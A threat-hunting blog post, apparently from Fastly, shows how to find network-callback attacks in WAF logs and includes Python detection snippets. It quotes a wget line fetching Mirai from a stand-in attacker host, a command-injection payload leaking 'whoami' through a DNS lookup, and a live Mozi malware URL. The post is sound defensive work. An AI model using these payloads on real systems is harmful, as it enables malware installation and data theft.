Threat hunting network callbacks in WAF data
Threat hunting is the practice of looking for active attackers who have possibly penetrated security boundaries within an organization. It requires a mixed set of skills across data analysis, security, networking, and, most importantly, a heavy dose of curiosity. In this post, we describe real-life examples of hunts our team performs using data from the Fastly Next-Gen WAF (powered by Signal Sciences). These examples are intended to spark ideas of how you could threat hunt using your WAF's data.
Overview
As part of standard tradecraft, attackers will often use static and dynamic application security testing techniques to gain information that helps them achieve their operational goals. If they are unable to get direct feedback about whether a particular attack is working, they may move into using out-of-band techniques.
Out-of-band application security testing relies on network callbacks (making the target application reach back out to the attacker) to confirm that a blind attack payload was successful. Malicious attackers use the same technique to load and execute malware by first confirming they can execute a callback and then grabbing the malicious file. Frequently, these callbacks will hit a mix of domains and specific IP addresses.
Armed with this knowledge, defenders can study network callbacks, either attempted or successful. This can be supplemented by event logs if they have good vantage points and the right logging enabled in their infrastructure.
WAF logs
The first thing needed for any hunt is data. In this case, we are focused on WAF logs that have been aggregated based on alerts of potential malice. If you’re taking a look at your own logs, just remember that they need to be collected and aggregated in a centralized data store (i.e., a SIEM or other repository).
If you’re a Fastly Next-Gen WAF customer, searching through a site’s request feed is an excellent source for this data. You can search by filtering on tags, in particular the tag object fields type and value.
Finding proverbial needles in haystacks
In the overview, we mentioned that for this particular threat hunt we searched for network-based callbacks in attack logs. We specifically looked at command injection and execution attempts which would then perform a network callback. We isolated the results by looking for references to common networking tools, such as curl, dig, netcat, nslookup, or wget; for example, wget http://attacker.example.com/bins/mirai.arm7.
For this type of attack to be successful, the attacker must execute something that already exists within the target environment. Using common system binaries this way is sometimes described as “living off the land,” and the binaries themselves are called LOLBins for short. For a more comprehensive search, you can use LOLBin lists such as LOLBAS and GTFOBins, which focus on Windows and Unix respectively.
By extracting these attack attempts in our environment, we identified some commonality among them. To better understand the attacks, we extracted a subset of the command line arguments following each LOLBin in the log entry, then looked for commonality in the arguments by aggregating and counting. This allowed us to extract domains and IP addresses from common attacks and enrich them with context from other data sources.
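The aggregation described above can be sketched in Python. This is a minimal illustration rather than the tooling we used: it assumes payloads have already been URL-decoded and are available as plain strings, and the names TOOLS, callback_targets, and count_targets are hypothetical. The regular expression is a heuristic, not a shell parser, so expect false positives (for example, an output filename passed to -O).

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Tools named in the text; extend with LOLBAS / GTFOBins entries as needed.
TOOLS = ("curl", "dig", "netcat", "nslookup", "wget")

# A tool name as a whole word, followed by its arguments up to the next
# shell separator (;, |, & or newline).
COMMAND_RE = re.compile(r"\b(" + "|".join(TOOLS) + r")\b\s+([^;|&\n]+)")


def callback_targets(payload):
    """Yield (tool, host) for each tool invocation found in a payload."""
    for tool, args in COMMAND_RE.findall(payload):
        for token in args.split():
            if token.startswith("-"):
                continue  # skip option flags such as -s
            # urlsplit only populates hostname when "//" precedes the host.
            candidate = token if "//" in token else "//" + token
            try:
                host = urlsplit(candidate).hostname
            except ValueError:
                host = None  # malformed token, e.g. unbalanced brackets
            if host:
                yield tool, host
                break  # keep only the first host-like argument


def count_targets(payloads):
    """Count how often each (tool, host) pair appears across payloads."""
    counts = Counter()
    for payload in payloads:
        counts.update(callback_targets(payload))
    return counts
```

Calling count_targets(payloads).most_common(20) on a batch of logged payloads gives a quick view of the hosts that show up most often, which is a reasonable starting point for enrichment.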
After performing our initial analysis, we started asking questions like:
Are attackers using common security tool domains? – e.g. burpcollaborator.net, interact.sh
Is the technology they’re attempting to exploit even relevant to the environment? – e.g. attempted Windows command execution in a Linux environment or vice versa
Are they attempting to use multiple IP addresses that have other attributes in common? – e.g. Mozi botnet using a common URI path with different IPs
Is the attacker callback server still live? Can we grab the payload from it?
When threat hunting, it’s valuable to answer questions like these to gain insight into the attacker’s objectives. After all, the possible next steps an attacker could take might seem infinite, so understanding their motivation can provide insight into which path is most likely.
Sometimes the data itself reveals the motivation, such as when bug bounty participants include a special X-header referencing their username on a bug bounty platform or use the username as a subdomain in the callback URI.
Security tools
Security tools are prevalent throughout our data. For the time period of our analysis, we found that approximately 3.6% of all command injection attempts contained a network callback. Of those, about 85% targeted known security tool domains.
Vendor/Tool | Domain(s) | % of CMDEXE (command execution) requests with a callback |
---|---|---|
Project Discovery | interact.sh | 57.77% |
Netsparker | r87.me | 19.33% |
Burp Suite | burpcollaborator.net | 7.20% |
Pentest-Tools.com | pentest-tools.com | 0.85% |
Appcheck NG | ptst.io | 0.16% |
Acunetix | bxss.me | 0.10% |
Total | | 85.41% |
This is not to say that malicious actors don’t use the same tools as penetration testers, but these requests are typically probes to determine whether an attack is working, not an attempt to pull hosted malware.
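One way to separate security tool probes from everything else is to match each callback host against the domains in the table above. The sketch below is an assumption about how such a lookup could be written, not a description of our pipeline; SECURITY_TOOL_DOMAINS and security_tool_for are hypothetical names, and the mapping contains only the domains listed in this post.

```python
# Domains taken from the table in this post; not an exhaustive list.
SECURITY_TOOL_DOMAINS = {
    "interact.sh": "Project Discovery",
    "r87.me": "Netsparker",
    "burpcollaborator.net": "Burp Suite",
    "pentest-tools.com": "Pentest-Tools.com",
    "ptst.io": "Appcheck NG",
    "bxss.me": "Acunetix",
}


def security_tool_for(host):
    """Return the vendor/tool for a listed domain or its subdomains, else None."""
    host = host.lower().rstrip(".")
    for domain, tool in SECURITY_TOOL_DOMAINS.items():
        # Match on a label boundary so "notinteract.sh" is not a hit.
        if host == domain or host.endswith("." + domain):
            return tool
    return None
```

Hosts that return None are the ones worth a closer look, since they are more likely to be attacker-controlled infrastructure than a scanner's collaborator service.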
However, these domains cannot be ignored because attackers may attempt to exfiltrate data over DNS or HTTP (e.g. leak an environment variable as a DNS subdomain) or use the toolset as reconnaissance for the next stage of an attack. A concrete example of this type of command injection payload is && dig `whoami`.c8qt8wk2vtc0000816hggrm7rqcyyyyyb.interact.sh. If the command runs, the shell substitutes the output of whoami into the hostname, so the attacker sees the username as a subdomain in the resulting DNS lookup.
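Payloads that embed shell substitution in a callback, like the dig example, can be flagged with a simple pattern match. The following is a rough sketch under the assumption that payloads are decoded strings; SUBSTITUTION_RE and embedded_substitutions are hypothetical names, and the pattern covers only backticks, $(...), and $VAR or ${VAR} forms.

```python
import re

SUBSTITUTION_RE = re.compile(
    r"`[^`]+`"                          # `command`
    r"|\$\([^)]+\)"                     # $(command)
    r"|\$\{?[A-Za-z_][A-Za-z0-9_]*\}?"  # $VAR or ${VAR}
)


def embedded_substitutions(payload):
    """Return every shell substitution expression found in a payload."""
    return [match.group(0) for match in SUBSTITUTION_RE.finditer(payload)]
```

A non-empty result on a request that also contains a callback host suggests the sender is trying to leak data rather than only confirm execution.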
IoT malware
In other cases, we’ve found that the attacker was trying to deploy IoT malware. In some attempted attacks, the callback is designed to pull a shell script and execute it. We found these attempts to be associated with Bashlite (a.k.a. Gafgyt) malware binaries.
The script is designed to pull the malware binary and try to execute it. It exhaustively tries all of its supported architectures, including those that are popular in IoT devices (e.g. MIPS, Motorola 68K).
Mozi malware is another IoT malware family that is easy to identify in WAF logs because it consistently uses the path /Mozi.m or /Mozi.a. A previously observed example of this is the URL http://183.188.6[.]132:50359/Mozi.m which delivered the Mozi malware with the hash 12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef.
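Because the Mozi paths are fixed, checking extracted callback URLs for them takes only a few lines. This sketch assumes URLs may arrive defanged with [.] as in the example above; MOZI_PATHS, refang, and is_mozi_url are hypothetical names.

```python
from urllib.parse import urlsplit

# Paths named in this post.
MOZI_PATHS = {"/Mozi.m", "/Mozi.a"}


def refang(indicator):
    """Undo the common "[.]" defanging so the URL can be parsed."""
    return indicator.replace("[.]", ".")


def is_mozi_url(url):
    """Return True when the URL path is one of the known Mozi paths."""
    return urlsplit(refang(url)).path in MOZI_PATHS
```

The check only parses the string and never contacts the host, so it is safe to run against raw indicators.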
The clear commonality in each of these examples comes from what we sought to hunt: network callbacks.
To mitigate network callbacks, preventing the initial payload from being successful is a clear recommendation, and attacks we successfully blocked for our customers created the visibility used to perform this hunt. However, another layer of defense would be to set up strict egress filtering and use an egress proxy/gateway for applications that do need to communicate outbound. This will give you a good vantage point to monitor and some peace of mind that you can prevent network callbacks in the future.
Network callbacks in XSS
Command injection is not the only attack type where out-of-band techniques are useful. Cross-site scripting (XSS) attacks also leverage them. However, the major difference is that the attack is targeting the application’s users rather than the application or server where it runs.
One example we uncovered during our investigation was a campaign that used a JavaScript obfuscator in an attempt to evade detections. At this point, we were focused on searching for JavaScript used in XSS attacks and identifying its purpose. During this search, payloads that have something as simple as an alert() are easy to identify, but others look like nothing more than random strings of characters. These can be obfuscation methods that hide the real purpose of the code.
A WAF can detect and mitigate XSS but generally does not understand anything about the underlying obfuscated content. To inspect this content, we created a Linux container for Node.js with non-root user permissions and no network access. We then carefully executed JavaScript snippets, avoiding function calls such as eval where possible, to get a sense for what the code was meant to do.
As we can see in the deobfuscated code (on the right side of the screenshot above), it is designed to call back to the domain and evaluate whatever comes back in the response. The behavior can therefore change over time to whatever the attacker's server responds with, but when we cross-checked this domain with third-party providers, it was flagged as a known source of JavaScript malware.
A second example attempted to evade detection by using mismatched case in its script tags and then loaded from a third-party resource. We’ve formatted the source of the response for clarity in the screenshot below.
The response from this domain was designed to inject an image tag into the DOM for the purpose of stealing user cookies. We notified the infrastructure provider where the campaign was being hosted so they could remove the threat.
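Mixed-case script tags are straightforward to surface when hunting through logged XSS payloads. The sketch below interprets "case mismatch" as a tag name that is neither all lowercase nor all uppercase, which is our assumption for illustration; SCRIPT_TAG_RE and mixed_case_script_tags are hypothetical names.

```python
import re

# Opening script tags in any casing, allowing whitespace after "<".
SCRIPT_TAG_RE = re.compile(r"<\s*(script)\b", re.IGNORECASE)


def mixed_case_script_tags(payload):
    """Return opening script tag names that mix upper and lower case."""
    names = SCRIPT_TAG_RE.findall(payload)
    return [name for name in names if name not in (name.lower(), name.upper())]
```

Legitimate markup rarely mixes case inside a tag name, so hits from this check are usually worth reviewing alongside the host the tag loads from.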
Why do all of this?
Threat hunting insights can help organizations prioritize the active threats they should focus on defending against. Data from real attacks hitting your organization’s network serves as evidence of what is or isn’t effective currently in your security program. It can kickstart discussions around vulnerability management priorities, incident response playbooks, and improvements to operational monitoring and observability.